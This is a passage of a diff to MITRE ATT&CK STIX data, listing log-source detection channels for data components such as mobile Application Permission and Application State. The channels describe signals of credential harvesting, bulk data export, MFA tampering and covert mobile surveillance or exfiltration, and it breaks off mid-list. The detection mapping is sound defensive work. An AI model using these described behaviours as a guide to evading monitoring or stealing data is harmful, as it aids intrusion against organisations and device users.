+                            "name": "NSM:Connections",
+                            "channel": "PushNotificationSent"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Failed password or accepted password for SSH users"
+                        },
+                        {
+                            "name": "saas:Airtable",
+                            "channel": "EXPORT: User-triggered data export via GUI or API"
+                        },
+                        {
+                            "name": "saas:application",
+                            "channel": "High-frequency invocation of SMS-related API endpoints from publicly accessible OTP or verification forms (e.g., Twilio: SendMessage, Cognito: AdminCreateUser) with irregular destination patterns."
+                        },
+                        {
+                            "name": "saas:application",
+                            "channel": "High-volume API calls or traffic via messaging or webhook service"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Rule/ConfigChange: Auto-forward rules, delegate assignments, or changes to financial approval workflows"
+                        },
+                        {
+                            "name": "saas:audit",
+                            "channel": "Application added or consent granted: Integration persisting after original user disabled"
+                        },
+                        {
+                            "name": "saas:box",
+                            "channel": "User navigated to admin interface"
+                        },
+                        {
+                            "name": "saas:collaboration",
+                            "channel": "MessagePosted: Suspicious links or attachment delivery via collaboration tools (Slack, Teams, Zoom)"
+                        },
+                        {
+                            "name": "saas:confluence",
+                            "channel": "access.content"
+                        },
+                        {
+                            "name": "saas:email",
+                            "channel": "AuthenticationFailures (SPF/DKIM/DMARC) OR Domain Mismatch"
+                        },
+                        {
+                            "name": "saas:finance",
+                            "channel": "Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts"
+                        },
+                        {
+                            "name": "saas:github",
+                            "channel": "Bulk access to multiple files or large volume of repo requests within short time window"
+                        },
+                        {
+                            "name": "saas:gmail",
+                            "channel": "SendEmail, OpenAttachment, ClickLink"
+                        },
+                        {
+                            "name": "saas:googledrive",
+                            "channel": "FileOpen / FileAccess: Event-driven script triggering on user file actions"
+                        },
+                        {
+                            "name": "saas:googleworkspace",
+                            "channel": "OAuth2 authorization grants / Admin role assignments"
+                        },
+                        {
+                            "name": "saas:hubspot",
+                            "channel": "contact_viewed, contact_exported, login"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Conditional Access policy rule modified or MFA requirement disabled"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "MFAChallengeIssued"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "WebUI access to administrator dashboard"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "Federation configuration update or signing certificate change"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "System API Call: user.read, group.read"
+                        },
+                        {
+                            "name": "saas:okta",
+                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
+                        },
+                        {
+                            "name": "saas:openai",
+                            "channel": "High volume of requests to /v1/chat/completions or /v1/images/generations"
+                        },
+                        {
+                            "name": "saas:salesforce",
+                            "channel": "DataExport, RestAPI, Login, ReportExport"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "file_upload, message_send, message_click"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "chat.postMessage, files.upload, or discovery API calls involving token/credential regex"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "OAuth token use by unknown app client_id accessing private channels or files"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "conversations.history, files.list, users.info, audit_logs"
+                        },
+                        {
+                            "name": "saas:slack",
+                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
+                        },
+                        {
+                            "name": "saas:Snowflake",
+                            "channel": "QUERY: Large or repeated SELECT * queries to sensitive tables"
+                        },
+                        {
+                            "name": "saas:teams",
+                            "channel": "ChatMessageSent, ChatMessageEdited, LinkClick"
+                        },
+                        {
+                            "name": "saas:zoom",
+                            "channel": "unusual web session tokens and automation patterns during login"
+                        },
+                        {
+                            "name": "saas:zoom",
+                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook errors loading or processing custom form templates"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Office Add-in load errors, abnormal loading context, or unsigned add-in warnings"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook rule execution failure or abnormal rule execution context"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Exchange Transport Service loads unusual .NET assembly or errors upon transport agent execution"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unexpected spikes in request volume, application-level errors, or thread pool exhaustion in web or API logs"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Browser or plugin/application logs showing script errors, plugin enumerations, or unusual extension load events"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook logs indicating failure to load or render HTML page in Home Page view"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "EventCode=1000"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Service crash, unhandled exception, or application hang warnings for critical services (e.g., IIS, DNS, SQL Server)"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "SCCM, Intune logs"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unexpected web application errors or CMS logs showing modification to index.html, default.aspx, or other public-facing files"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "VPN, Citrix, or remote access gateway logs showing external IP addresses"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Outlook rule creation, form load, or homepage redirection"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "High-frequency errors or hangs from resource-intensive application components (e.g., .NET, IIS, Office Suite)"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Exchange logs or header artifacts"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "Unusual DLL/plugin registration for IIS/SQL/Apache or unexpected error logs"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=6416"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=1102"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Changes to applicationhost.config or DLLs loaded by w3wp.exe"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Device started/installed (UMDF) GUIDs"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=1000"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=104"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=1341, 1342, 1020, 1063"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.776000+00:00\", \"old_value\": \"2026-04-24 19:46:47.171000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-13 20:00:08.487000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0114",
+                            "external_id": "DC0114"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application Permission",
+                    "description": "Represents the permissions, entitlements, or capability grants associated with a mobile application, including both permissions declared by the application and those granted or requested during runtime.\n\nMonitoring permission state helps defenders identify applications attempting to access protected device resources such as sensors, storage, communications interfaces, or system services.\n\nExamples include:\n\nAndroid\n\n- Permissions declared in AndroidManifest.xml\n- Runtime permission prompts\n- Special access privileges (AccessibilityService, overlay, device admin)\n\niOS\n\n- App entitlements in provisioning profiles\n- Privacy permission prompts\n- Capability grants for device services\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "READ_EXTERNAL_STORAGE / MANAGE_EXTERNAL_STORAGE permission present or toggled at runtime"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining RECORD_AUDIO permission or privileged CAPTURE_AUDIO_OUTPUT capability"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Application installed with NSMicrophoneUsageDescription entitlement indicating microphone capability"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Application granted/retaining ACCESS_FINE_LOCATION and/or ACCESS_COARSE_LOCATION; background location capability present (ACCESS_BACKGROUND_LOCATION on Android 10+)"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "App installed with location usage declarations (WhenInUse/Always usage description) and granted authorization level via managed policy state"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Device inventory changes involving phone number/line identifier fields (when available), eSIM profile presence, or compliance signal indicating SIM profile change"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed device inventory change indicating cellular plan/eSIM profile updates (where available via supervised iOS + MDM reporting)"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "New permission prompt, package install attempt, accessibility/overlay special access request, or other post-browse capability escalation following browser/WebView activity"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Post-browse configuration profile prompt, managed/unmanaged app handoff anomaly, or compliance-relevant state change shortly after browser activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "ADB_DEBUGGING_ENABLED"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Compliance posture or restriction state relevant to accessory access, USB restricted mode, supervised trust policy, or backup/pairing restrictions"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Application gains or is observed with elevated interaction capability such as accessibility, overlay, device admin, notification access, or other authentication-adjacent special access"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App with network-, telephony-, Wi-Fi-, or location-adjacent capability is impacted by abrupt repeated service loss while permissions remain unchanged"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Network- or location-dependent app capability state remains unchanged while the app experiences sustained communication failure"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application holds or is granted broad storage, document-provider, media, or file-management capability inconsistent with its expected role before or during bulk file transformation"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Known application or newly updated version declares, gains, or activates expanded storage, sensor, communications, accessibility, or device-management capability inconsistent with prior baseline or app role"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Known application version declares, gains, or first exercises storage, communications, accessibility, advertising, analytics, overlay, or sensor-adjacent capability inconsistent with prior version baseline or business role"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Device enrollment or compliance event shows failed or degraded verified boot, hardware-backed attestation mismatch, patch/build/baseband inconsistency, or unexpected device property drift near first contact"
+                        },
+                        {
+                            "name": "android:MDMLog ",
+                            "channel": "Application granted or retaining the READ_CALENDAR or WRITE_CALENDAR permissions. "
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised enrollment, activation, or inventory event reveals unexpected device property relationships, anomalous managed posture, unexplained configuration drift near first contact, or identity/inventory characteristics inconsistent with approved procurement baseline"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed or trusted app is newly installed or updated and presents changed package identity, signing relationship, version lineage, installer source, or permission posture inconsistent with approved baseline"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app is newly installed or updated and presents unexpected version transition, inventory drift, managed-state change, or app attribute mismatch against approved procurement and release baseline"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App communicating with legitimate web-service infrastructure is unmanaged, newly installed, recently updated, outside approved app list, or shows baseline drift in role, installer source, or expected capability profile"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed app communicating with legitimate web-service infrastructure is newly installed, recently updated, outside expected managed-app set, or displays baseline drift in app role, release path, or business justification"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App initiating resolver\u2192pivot sequence was unmanaged or not authorized to communicate with detected web-service class or external infrastructure"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing resolver\u2192pivot sequence not present in approved managed-app baseline or lacks expected service relationship"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing bidirectional exchange was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for read/write operations"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing bidirectional exchange was not present in approved managed-app baseline or was not permitted to use detected public web-service class for read/write operations"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing repeated one-way retrieval was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for background content retrieval"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing repeated one-way retrieval was not present in approved managed-app baseline or was not permitted to use detected public web-service class for background content retrieval"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing camera session was unmanaged, recently granted camera permission, or not approved to use camera for video or interval image capture"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining the READ_CALL_LOG permission. "
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining the READ_CONTACTS permission."
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing camera session was not present in approved managed-app baseline or was not permitted to use camera for video or interval image capture"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining the READ_SMS or RECEIVE_SMS permission."
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing screen capture had unapproved accessibility posture, capture-related special access, unmanaged state, or was not approved for screen recording or assistive observation workflows"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "NotificationListenerService enabled OR notification access granted to app not in enterprise-approved list"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "App not in approved cryptographic or secure communication category performing keypair + encryption + transmission behavior"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app with undeclared secure transport behavior or app category mismatch initiates opaque TLS communications inconsistent with enterprise policy baseline"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app with undeclared secure transport behavior or unexpected network role communicates with non-baselined destination over opaque TLS"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed application with no declared backup, sync, export, or media-editing role performs bulk local packaging or encrypted archive generation"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app without expected export, backup, or sync role performs local data staging behavior followed by opaque upload activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app granted or retaining storage-related or elevated access inconsistent with declared function prior to local data access activity"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app without expected local export, sync, or forensic role accesses or stages local records inconsistent with policy baseline"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app without approved content-download, update, browser, or file-sync role performs remote payload retrieval and local tool staging"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised managed app without approved update, browser, sync, or enterprise-content role retrieves and stages secondary content inconsistent with policy baseline"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed application without approved native-code role or expected high-performance/native dependency exhibits native execution behavior inconsistent with enterprise policy baseline"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed application package version, signer lineage, installer source, or app identity changes outside approved enterprise or store-mediated update workflow"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app granted SEND_SMS or RECEIVE_SMS permission, or app role/policy indicates SMS-capable behavior inconsistent with approved enterprise function before SMS control activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Default SMS handler changes to non-baselined application or managed app unexpectedly becomes or remains device default SMS app during SMS control phase"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app without approved VPN, enterprise tunneling, browser, or remote-access role exhibits proxy-like traffic handling inconsistent with policy baseline"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Managed app granted call-control-relevant permissions or telecom role state inconsistent with approved enterprise function before call-control activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Default phone or telecom-handling role changes to non-baselined application or managed app unexpectedly becomes dialer/call-handling app during call-control phase"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "device transitions to non-compliant state + root detected or integrity attestation failure (SafetyNet/Play Integrity)"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application integrity mismatch or package signature inconsistency relative to expected deployment baseline"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application granted high-risk permission or special access (AccessibilityService, SYSTEM_ALERT_WINDOW, DeviceAdmin) with abnormal grant pattern (e.g., no recent user interaction or rapid sequence of grants)"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application granted Device Administrator privilege + abnormal activation pattern (e.g., rapid enablement after install or no recent user interaction)"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application holds permissions enabling environment validation (e.g., location, phone state, nearby device/network context) and subsequently delays protected activity until qualifying values are present"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "application has approved capabilities required for conditional execution (e.g., location/background modes) but observed behavior is deferred until target-specific state is present"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application granted ACCESS_FINE_LOCATION and, when required for background operation, ACCESS_BACKGROUND_LOCATION + capability state sufficient for persistent geolocation monitoring before later guarded activity"
+                        },
+                        {
+                            "name": "iOS:MDMLog",
+                            "channel": "application authorized for when-in-use or always location access and, where relevant, background execution capability sufficient for continued geographic evaluation before later guarded behavior"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "managed app inventory or launcher-visible state changes show application remains installed but user-facing entry point or launcher component becomes disabled before later runtime activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "installed application remains present while launcher-visible activity or component discoverability changes to hidden, disabled, or synthesized-settings-entry state prior to later runtime activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "change to security-relevant device configuration or managed policy (e.g., accessibility enablement, app admin changes, security service state change) preceding telemetry degradation"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application enabled as device administrator, device owner, profile owner, or equivalent elevated management role before uninstall attempt"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application granted accessibility service privileges capable of screen observation or global action invocation before removal attempt"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application enabled as device administrator, device owner, or profile owner before screen-lock or password-control activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application granted accessibility service privileges capable of intercepting UI flow or sustaining user-interaction denial before lockout event"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "device posture changes to rooted, non-compliant, weakened security state, or elevated control role becomes active before security-tool degradation"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "security-relevant application package state, enabled status, administrator state, or managed protection setting changes immediately before monitoring degradation"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "device posture or compromise-state indicators change unexpectedly, including rooted or non-compliant status disappearance, after prior app or system activity suggesting persistence on device"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "managed application state changes unexpectedly through uninstall, disappearance from expected inventory, or install-state mismatch after prior suspicious activity"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application holds device-owner, profile-owner, or delegated app-management authority capable of package removal before uninstall event"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application has accessibility service privileges immediately before package-removal UI flow and subsequent application disappearance"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "device posture indicates rooted, compromised, or non-compliant state before package files disappear without standard managed uninstall workflow"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "application holds device administrator, device owner, or other managed authority capable of wipe or destructive device-level action before bulk file loss or wipe event"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "device posture indicates rooted, compromised, or non-compliant state before protected or atypical filesystem deletion activity"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-23 18:21:10.349000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-03-11 16:00:13.775000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0123",
+                            "external_id": "DC0123"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application State",
+                    "description": "Application State represents the operational status and lifecycle context of a mobile application at a given point in time. This includes whether the application is running in the foreground or background, its activity state, recent user interaction, and transitions between lifecycle states.\n\nMonitoring application state helps defenders identify suspicious behavior where an application performs sensitive actions while inactive, in the background, or without recent user interaction.\n\nApplication state is particularly useful when detecting malicious activity that occurs outside normal user-driven workflows.\n\nExamples\nAndroid\n\n- Application transitions from foreground to background\n- Application running as a background service\n- Application started via broadcast receiver\n- Application launched automatically after device boot\n\niOS\n\n- Application entering active, inactive, or background state\n- Background task execution\n- Background fetch activity\n- Application wake events triggered by push notifications or system services\n\nData Collection Measures\n- Mobile EDR / MTD runtime monitoring\n- OS lifecycle event telemetry\n- Application runtime instrumentation\n- Mobile security platform behavioral monitoring\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "pplication or service remains active, foregrounds, or overlays during device locked state or immediately at unlock transition with weak recent user interaction context"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application wakes, becomes active, refreshes, or foregrounds immediately after locked or inactive state transition with weak recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Foreground or background applications remain active while network-dependent activity stalls, retries, or transitions into repeated failure state"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application runs in foreground, service, or sustained background-active state while concentrated file transformation occurs with weak or no recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Updated or newly delivered application becomes active, launches background services, or executes shortly after install/update with minimal user interaction inconsistent with baseline"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction"
+                        },
+                        {
+                            "name": "android:MDMLog",
+                            "channel": "Newly installed or updated application launches background service, becomes active without recent user interaction, or executes immediately after update in a pattern inconsistent with baseline"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Protected resource use or privileged framework access occurs while device is locked, before normal setup completion, or from an app/service not in foreground and not on approved preload list"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app or device-originated network activity occurs while the device is locked or before expected managed app initialization sequence, inconsistent with expected background refresh baseline"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app begins background execution, persistent service activity, overlay-like behavior, or lock-state activity inconsistent with its historical baseline or expected first-run sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated managed app begins background activity, persistent refresh, or lock-state-adjacent activity inconsistent with expected first-run behavior, user interaction timing, or historical baseline"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App communicating with external web service is backgrounded, persistent, recently awakened, or active while device is locked or without recent user interaction in a way inconsistent with expected app behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app shows background activity, refresh, or lock-state-adjacent execution temporally aligned to web-service communication without expected foreground use or recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background or foreground_service active when resolver retrieval request occurred and pivot connection followed without foreground transition"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before resolver retrieval and subsequent pivot connection sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked or BackgroundRefresh active during resolver\u2192pivot sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before resolver request and pivot connection sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background when bidirectional exchange with public web-service domain began and no foreground transition occurred between retrieval and outbound write"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "BackgroundRefresh or background activity was active when retrieve-then-write exchange with public web-service domain occurred"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background when repeated retrieval from public web-service domain began and no foreground transition occurred during the retrieval sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background when non-standard-port session began and no foreground transition occurred during repeated or persistent connection sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before camera session start and no foreground transition occurred during sustained capture interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background activity, low-interaction device state, or DeviceLockState=locked was observed during sustained camera session or immediately before camera access from same bundle context"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Capturing app remained backgrounded or foreground-service-only while screen capture session occurred and another app was foregrounded during capture interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before screen capture session start and no expected foreground transition or consent-linked interaction occurred during capture interval"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Sensitive app category remained foregrounded during screen capture session from different app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Injecting app remained backgrounded or foreground-service-only while injected click, global action, or text insertion occurred in a different foreground app"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before injected UI action and no matching touch interaction was observed for the target foreground app during injection sequence"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Sensitive app category remained foregrounded during injected UI sequence from different app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Notification access event occurs while app_state=background AND device_state=locked OR no recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Asymmetric crypto operations occur while app_state=background OR device_locked=true OR no recent user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "TLS trust customization and outbound HTTPS session occur while app_state=background or device_locked=true or recent_user_interaction=false"
